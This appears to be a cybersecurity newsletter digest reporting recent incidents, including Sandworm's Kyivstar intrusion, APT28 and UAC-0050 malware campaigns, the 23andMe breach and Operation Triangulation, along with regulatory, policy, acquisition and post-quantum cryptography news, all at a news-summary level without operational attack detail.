At a glance.
- Sandworm was in Kyivstar's networks for months.
- GRU cyber campaign incorporates novel malware.
- GXC Team's latest offerings in the C2C underground market.
- Data breach blamed on password reuse.
- UAC-0050 deploys RemcosRAT against Ukrainian targets.
- NPM dependency campaign.
- Cyber-kidnapping in Utah.
- Cameras hacked by Russian intelligence services to provide targeting information.
- NoName057(16) as a model for future hacktivist auxiliaries.
- US Department of Homeland Security assesses cyber threats to the US.
- Zero-click exploit affects iPhones belonging to Kaspersky employees.
- Amnesty International reports Pegasus use in India.
- Cyber Toufan claims attacks against Israeli targets.
- The impact of the European Data Act.
Sandworm was in Kyivstar's networks for months.
Illia Vitiuk, who leads Ukraine's SBU cybersecurity department, has told Reuters that the Sandworm element of Russia's GRU had gained access to telecom provider Kyivstar's networks at least as long ago as May of 2023. Sandworm probably began its attempts against Kyivstar as early as March of that year. Its goal was collection, mostly of data on individual users of Kyivstar's services, followed in the last stages of the operation by destruction of data and disruption of services. A nominally hacktivist group, Solntsepyok, had claimed credit for the attack, but Solntsepyok is almost surely a GRU front.
The effects of the attack on Kyivstar were severe and widespread, but mostly affected civilian users as opposed to military operations--the Ukrainian military doesn't make much tactical use of civilian telecoms. Vitiuk sees the attack as a warning. "This attack is a big message, a big warning," he said, "not only to Ukraine, but for the whole Western world to understand that no one is actually untouchable." Kyivstar is a large, wealthy, private company, a subsidiary of the Netherlands multinational VEON, and it was by no means a soft target. Kyivstar was known for its extensive investment in cybersecurity, but it was successfully attacked nonetheless.
GRU cyber campaign incorporates novel malware.
A phishing campaign run between December 15th and 25th against both Polish and Ukrainian targets has been traced to Russia's GRU, specifically to APT28, Fancy Bear. CERT-UA published details of its investigation into the attack technique: "In the process of investigating the incidents, it was found that the mentioned links redirect the victim to a web resource where, with the help of JavaScript and features of the application protocol 'search' ('ms-search'), a shortcut file is downloaded, the opening of which leads to the launch A PowerShell command designed to download from a remote (SMB) resource and run (open) a decoy document, as well as the Python programming language interpreter and the Client.py file classified as MASEPIE." The Record notes that the campaign appears intended to propagate across networks, and that it's not confined to compromises of individual devices. GovInfo Security suggests that Russia's record indicates that a wave of attacks like this is likely to precede a major cyber or kinetic operation.
GXC Team's latest offerings in the C2C underground market.
Resecurity is tracking a cybercriminal gang, “GXC Team,” that develops and sells tools to facilitate online banking theft and social engineering attacks. In November, the gang began selling a tool that uses artificial intelligence to craft fraudulent invoices for use in business email compromise (BEC) attacks. The invoices can hijack business transactions by replacing banking information contained in legitimate invoices. This tool is the latest in a wide variety of social engineering platforms developed by the threat actor.
It's not their first offering in the C2C market. “Previously, the ‘GXC Team’ gained notoriety for creating a wide array of online fraud tools, ranging from compromised payment data checkers to sophisticated phishing and smishing kits,” Resecurity says. “They have been considered the masterminds in this illicit field, supplying fellow cybercriminals with a suite of ready-to-use tools designed to defraud innocent consumers globally. Additionally, they offer ongoing updates and technical support for conducting fraud."
Data breach blamed on password reuse.
Genetic testing company 23andMe has attracted criticism for its response to a major data breach the company sustained in December, TechCrunch reports. The hackers gained initial access by brute-forcing the accounts of 14,000 customers, then gaining access to the data of 6.9 million users who had opted-in to the service’s DNA Relatives feature. 23andMe’s response to the breach has been widely perceived as victim-blaming.
23andMe stated in an email to customers who are suing the company that “users negligently recycled and failed to update their passwords following these past security incidents, which are unrelated to 23andMe. Therefore, the incident was not a result of 23andMe’s alleged failure to maintain reasonable security measures.”
Hassan Zavareei, one of the lawyers representing victims of the breach, told TechCrunch, “23andMe knew or should have known that many consumers use recycled passwords and thus that 23andMe should have implemented some of the many safeguards available to protect against credential stuffing — especially considering that 23andMe stores personal identifying information, health information, and genetic information on its platform.”
UAC-0050 deploys RemcosRAT against Ukrainian targets.
Uptycs researchers report new developments in the investigation of UAC-0050's cyberespionage operations against Ukraine. "Our Threat Research Team initiated an investigation after the Uptycs platform alerted to a suspicious .lnk file on December 21, 2023. Analysis revealed UAC-0050's deployment of RemcosRAT in a targeted cyber intelligence operation against Ukrainian government agencies."
RemcosRAT is no novelty, and UAC-0050, a group of uncertain control but clearly aligned with Russian intelligence interests, has for the last few years used it as one of its preferred tools. The use of a malicious .lnk file, however, has rendered the attack more effective and more difficult to detect and counter. "In this case," Uptycs writes, "the malicious .lnk file gathers information regarding antivirus products installed on the target computer. It verifies if the display name corresponds to 'Windows Defender'. If so, it proceeds to replace the term with an empty string. As a result, the condition within the ‘if’ statement becomes false, preventing the execution of the ‘exit’ statement. Consequently, the script seamlessly continues with any subsequent code."
The report offers defensive recommendations and a list of indicators of compromise.
NPM dependency campaign.
Checkmarx warns of an apparent troll campaign in the NPM registry that could lead to denial-of-service incidents. A user uploaded a package named “everything” to the registry, which “relies on every other public NPM package, resulting in millions of transitive dependencies.” As a result, users who install the package will experience “issues like storage space exhaustion and disruptions in build pipelines.”
The user is remorseful, and says he didn’t realize he wouldn’t be able to delete the package once it was incorporated into other users’ projects.
Cyber-kidnapping in Utah.
A Chinese exchange student studying in Riverdale City, Utah, and living with a host family has been found after what the authorities are calling a "cyber-kidnapping." It's so called because the victim and his abductors didn't meet, physically. Instead, they contacted him online and directed him to quietly leave and stay isolated in a tent in the mountains near Brigham City, some distance away from his hosts. They threatened to harm his family back in China if he didn't comply. As they did this, they also sent his family a ransom demand, also online, $80,000 of which they paid.
The Deseret News usefully defines "cyber-kidnapping" as "a form of crime in which victims are targeted by online attackers and coerced into isolating themselves in order to demand ransom from their families." It's a form of kidnapping that relies entirely on threatening the victims into compliance, with no direct physical contact required for the crime. The remedy? If you're contacted by cyber-kidnappers, don't follow their instructions, but instead call the police at once.
Cameras hacked by Russian intelligence services to provide targeting information.
Interfax-Ukraine reports that the SBU identified and disabled some Internet-connected security cameras in Kyiv that had been compromised by Russian intelligence services and used to select targets and correct missile targeting during the recent strikes. "According to available information, with the help of these cameras, the aggressor was collecting data for the preparation and correction of strikes on Kyiv," the SBU said. The Record notes that Russian security services are believed to have gained access not only to camera feeds, but to camera controls as well, and with them obtained the ability to direct the cameras toward areas of interest. Reports suggested that the imagery could have been used to correct the fall of shot. That's likelier in the case of cannon fire or free, unguided rockets, but less likely for drones or guided missiles. "Correcting targeting" probably means that the imagery could be valuable pre-strike in target selection, and post-strike in battle damage assessment.
NoName057(16) as a model for future hacktivist auxiliaries.
NoName057(16) selects targets for attack by its supporters, and it offers a distinctive mix of ideological gratification and financial incentives. It's highly disciplined, focused on hitting sites and organizations it brands as "Russophobic," and it's open to volunteers, especially those interested in deploying NoName's DDOSia tool against properly designated targets. The group's approach, CSO writes, in an appreciation that suggests NoName057(16) offers a template for hacktivist auxiliaries, is highly gamified, with ranks and accomplishments structured in ways immediately intelligible to online gamers. The group engages in three main kinds of activity, according to CSO: "disinformation, intimidation, and chaos creation." By "chaos creation" CSO means distributed denial-of-service (DDoS) activity, and that indeed has been the most prominent of NoName's operations. The disinformation and intimidation amount for the most part to trolling.
US Department of Homeland Security assesses cyber threats to the US.
In its annual Homeland Threat Assessment for 2024, the US Department of Homeland Security's Office of Intelligence and Analysis predicts a continuing Russian threat in cyberspace. It draws particular attention to three expected areas of Russian activity against the US to emanate from Russia's war against Ukraine: influence operations, privateering by cyber criminals and disruption by hacktivist auxiliaries, and cyberespionage by intelligence services. Iran and China are also prominently mentioned among the cyber threats expected to be active against the US this year. Much of Iran's activity can be expected to be connected to the war between Hamas and Israel. China represents a major continuing threat. Tensions over Taiwan are expected to continue and probably increase, but most of China's activity in cyberspace will in all likelihood be directed toward long-term political and (especially) economic competition with the US and other rivals. Notably absent from the threat assessment is North Korea.
Zero-click exploit affects iPhones belonging to Kaspersky employees.
Ars Technica reports that iPhones belonging to Kaspersky employees were targeted by an advanced exploit over the course of four years. Ars Technica says “the unknown attackers were able to achieve an unprecedented level of access by exploiting a vulnerability in an undocumented hardware feature that few if anyone outside of Apple and chip suppliers such as ARM Holdings knew of.”
Kaspersky researcher Boris Larin told the publication, “The exploit's sophistication and the feature's obscurity suggest the attackers had advanced technical capabilities. Our analysis hasn't revealed how they became aware of this feature, but we're exploring all possibilities, including accidental disclosure in past firmware or source code releases. They may also have stumbled upon it through hardware reverse engineering.” "Triangulation," as Kaspersky calls both the campaign and the malware it distributed, seems to have been active since 2019 at least.
Russia’s FSB has for some time accused Apple of colluding with the US NSA. In this case, however, Kaspersky explicitly declined to make any attribution, telling Ars Technica, “Currently, we cannot conclusively attribute this cyberattack to any known threat actor. The unique characteristics observed in Operation Triangulation don't align with patterns of known campaigns, making attribution challenging at this stage.”
Amnesty International reports Pegasus use in India.
Amnesty International reported last week that its Security Lab had found evidence of Indian government use of NSO Group's Pegasus intercept tool against journalists working in that country. The cases addressed in the report surfaced between June and October of 2023. Concerns about Pegasus use in India aren't new--the country's Supreme Court ordered an independent investigation into abuse of lawful intercept tools back in October.
Cyber Toufan claims attacks against Israeli targets.
The Record reports that Cyber Toufan, a group claiming adherence to the cause of Hamas, claims to have beached dozens of Israeli organizations, and has promised to dump stolen data online over the coming month. Cyber Toufan has been credibly assessed by Check Point to be an Iranian hacktivist auxiliary, but the group itself dismisses this as Israeli propaganda. They prefer to be seen as grassroots Hamas activists. “The Israeli media and Israel's top cybersecurity firms seem pretty confident in their attribution of us and our work to one foreign state entity or another. We are not surprised,” the Record quotes them as saying. "The lies they tell themselves about the capabilities of the resistance is what allowed us to strike as hard as we did on October the 7th, all under the noses of their very own intelligence and military apparatus.” In addition to Israeli organizations, Cyber Toufan claims to have also breached international firms doing business in Israel.
An assessment of Iranian cyberattacks against control systems.
Recent incursions by Iran's CyberAv3ngers into control systems, most prominently but not exclusively into systems used in US and European municipal water systems, represent a threat to industrial controls, but that may not have been the point of the most recent attacks. The control systems hit were Israeli-made, and Dragos thinks the point being made was political and persuasive, and that the incidents didn't immediately represent a serious attempt at physical disruption. "The #CyberAv3ngers hacktivist group activity targeting critical utilities in the US/Europe is less about making an impact on OT, and more about driving geopolitical agendas," Dragos tweeted late last week.
The impact of the European Data Act.
The European Data Act, which was published in the Official Journal of the European Union just before Christmas, is scheduled to come into effect on January 11. By facilitating data sharing in order to establish a fair and competitive data market, the law stands to protect consumers and their data while also benefiting data collecting businesses and aftermarket services providers alike. cyber/data/privacy insights provides a primer on what the new law means for the EU’s data strategy. In order to make data accessible to users, third parties, and public sector bodies under certain conditions, the European Data Act imposes obligations on manufacturers of connected devices and providers of related services.
The Data Act also addresses unfair contractual terms and dictates new rules making it easier for customers to switch between different data processing providers without undue delay or cost. Additionally, the law expands the obligations for international data transfers under the General Data Protection Regulation (GDPR) and the Schrems II ruling to data processing services providers, requiring them to provide necessary safeguards to protect data from incompatible or unlawful access by third governments.
For instance, third parties receiving data at the request of a user will be allowed to use the data only for the agreed upon, and will be required to erase the data when it is no longer needed. The Data Act’s third chapter states the conditions and compensation under which data holders can make data available to data recipients and states that the data holder cannot discriminate regarding arrangements for making data available between comparable categories of data recipients. The prediction is that by promoting innovative services and healthier competition for aftermarket services, the Data Act will increase the gross domestic product by 270 billion euros by 2028. Although the law will come into effect later this month, most of its rules will begin to apply in September 2025, with some rules taking effect as late as 2027.
OSS and SBOM guidance from the National Security Agency.
Last month the US National Security Agency (NSA) released guidance on software supply chain security, and it focused on best practices concerning open-source software (OSS) and software bills of materials, or SBOMs. While this publication is not the first to concentrate on securing the software supply chain – which has increasingly become an attractive target for malicious actors – it builds upon guidance previously doled out by the White House and requirements issued by federal agencies like the Office of Management and Budget.
CSO Online provides an overview of the guidelines, which are broken down into four main areas: open-source software management; creating and maintaining a company-internal secure open-source repository; open-source software maintenance, support, and crisis management; and SBOM creation, validation, and artifacts. Highlights include primary considerations for using OSS, which include evaluating OSS components for vulnerabilities and ensuring that vulnerable components aren't included in products, and staying abreast of licensing considerations and export controls, especially given the continued evolution of EU regulations. The publication also notes that SBOMs not only serve as a way of inventorying OSS components, but can also provide increased transparency for downstream consumers. (NSA urges organizations to use the minimum element requirements documented in the National Telecommunications and Information Administration’s "Minimum Elements for a SBOM.”) Regarding SBOM creation, NSA acknowledges that SBOMS can be created at various phases of the software development lifecycle, and as such, the guidance breaks SBOM tools into four categories: source, binary, package, and runtime extractors.
To better maintain and protect these OSS components, NSA recommends adherence to secure code signing requirements, such as performing code signing, using proven cryptography, and securing the code signing infrastructure. Building on previous guidance like NIST's Incident Handling Guide, NSA also calls for organizations to have a crisis management plan at the ready.
Mergers and acquisitions.
Cisco will acquire open-source cloud-native networking and security firm Isovalent. The acquisition is expected to close in the third quarter of fiscal year 2024.
SentinelOne has agreed to acquire Bengalaru-based cloud-native application protection platform (CNAPP) provider PingSafe.
SonicWall has acquired security service edge provider Banyan Security.
Palo Alto Networks has completed its acquisition of Israeli secure browser technology provider Talon Cyber Security, SecurityWeek reports.
Investments and exits.
Boston-based cloud-native security company Aqua Security has secured $60 million in a Series E extension led by Evolution Equity Partners, with participation from existing investors Insight Partners, Lightspeed Venture Partners, and StepStone Group. The funding brings the company's valuation to over $1 billion.
New year, new post-quantum cryptography standards.
As we welcome the new year, the digital community also welcomes a new era of data encryption. At the end of 2023, the US National Institute of Standards and Technology (NIST) began the process of finalizing three Post-Quantum Cryptography (PQC) algorithms designed to replace RSA and other long-held protocols used to encrypt digital communications. As quantum computing technology advances, it’s only a matter of time before these old encryption techniques become useless in the face of quantum decryption tactics.
Now, as Breaking Defense explains, it’s up to government agencies and private companies to remove the outdated algorithms and replace them with the NIST-approved PQC protocols. And it’s a race against time, as rivals might already be harvesting data that’s unprotected by PQC and holding onto it until a quantum computer can crack the code. In fact, NIST senior cybersecurity engineer Bill Newhouse says that any data that’s already fallen prey to this “harvest now, decrypt later” strategy could be rendered unusable. At a recent event hosted by the Advanced Technology Academic Research Center, Newhouse stated, “This migration [to PQC] should be the biggest one ever undertaken.”
That said, technically organizations can not yet implement the new protocols, at least not until they’re officially finalized. They must still undergo a slate of adjudication and validation processes that, according to NewHouse, could take “months or years.” In the meantime, organizations are strongly encouraged to take inventory of their software and create a detailed list of the applications where RSA or other outdated encryption protocols are being used. And that could be a very long list. Wanda Jones-Heath, principal cyber advisor for the Air Force, explains, “It impacts everything we do, from switches to routers to our most prized possessions, our critical weapons systems. If we had not started this two years ago, we would be even further behind.”